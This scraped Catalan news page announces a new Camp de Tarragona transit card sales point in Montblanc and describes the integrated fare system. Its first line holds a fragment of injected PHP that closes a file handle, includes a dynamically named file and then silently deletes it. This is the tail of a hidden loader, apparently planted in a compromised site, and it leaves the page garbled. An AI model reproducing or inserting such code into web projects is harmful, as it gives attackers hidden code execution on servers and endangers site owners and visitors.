");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> EL Consell Comarcal de la Conca de Barberà posa en marxa un punt de venda de targetes de l'ATM del Camp de Tarragona
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

EL Consell Comarcal de la Conca de Barberà posa en marxa un punt de venda de targetes de l'ATM del Camp de Tarragona (14/01/2020)

A partir d’ara els ciutadans de Montblanc i la Conca de Barberà disposen d’un nou punt on adquirir les targes del servei públic de transport del Camp de Tarragona. Aquest nou punt de venda d‘aquestes targetes està situat a la seu de Montblanc del Consell Comarcal de la Conca de Barberà; al Palau Alenyà (c. de Sant Josep, número 18).

Com a novetat, a la seu del Consell Comarcal es podran comprar les targes bonificades, que fins ara només es podien adquirir a Tarragona.

El Consell Comarcal de la Conca de Barberà, conjuntament amb l’ATM del Camp de Tarragona, ha posat en marxa un punt de venda i recàrrega de les targes i títols de transport públic del Camp de Tarragona, per tal de facilitar al màxim a la ciutadania l’accés als transports públics i promoure’n el seu ús.

El sistema tarifari integrat del Camp de Tarragona permet als seus usuaris utilitzar els diferents operadors de transport de bus urbà, interurbà i ferrocarril amb una única targeta. Es un sistema molt senzill i que facilita moure’s lliurement pel Camp de Tarragona amb importants avantatges econòmics.

Entre els avantatges destaquen:
• Utilitzar targetes sense contacte reutilitzables per emmagatzemar els títols de transport
• Classificar un territori de 132 municipis en només cinc zones amb el que es simplifica l’oferta de títols i per tant l’elecció dels clients.
• Permet fer un desplaçament sencer (origen - destinació) amb transbordaments sense cost dins d’un límit horari, amb el que l’usuari estalvia i es pot despreocupar de l’operador del transport que ha de fer servir.

Per altra banda, el sistema tarifari integrat possibilita:
• Fer desplaçaments amb diferents operadors de transport fent servir el mateix títol dins la seva zona geogràfica de validesa.
• Fer transbordaments més fàcils i barats mitjançant uns sistemes de validació.
• Fer més accessible l’adquisició de les targetes i dels títol de transport mitjançant una àmplia xarxa de venda i recàrrega.
• Oferir als clients un àmplia gama de títols ajustada a les seves necessitats. (T-Mes, T-50/30, T-10/30, T-10 T-FM/FN70/90, T-12)
• Oferir avantatges socials sobre el preu del transport públic a determinats coŀlectius (infants fins a 12 anys, famílies monoparentals, famílies nombroses, persones amb situació d’atur i membres de la comunitat universitària URV.

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona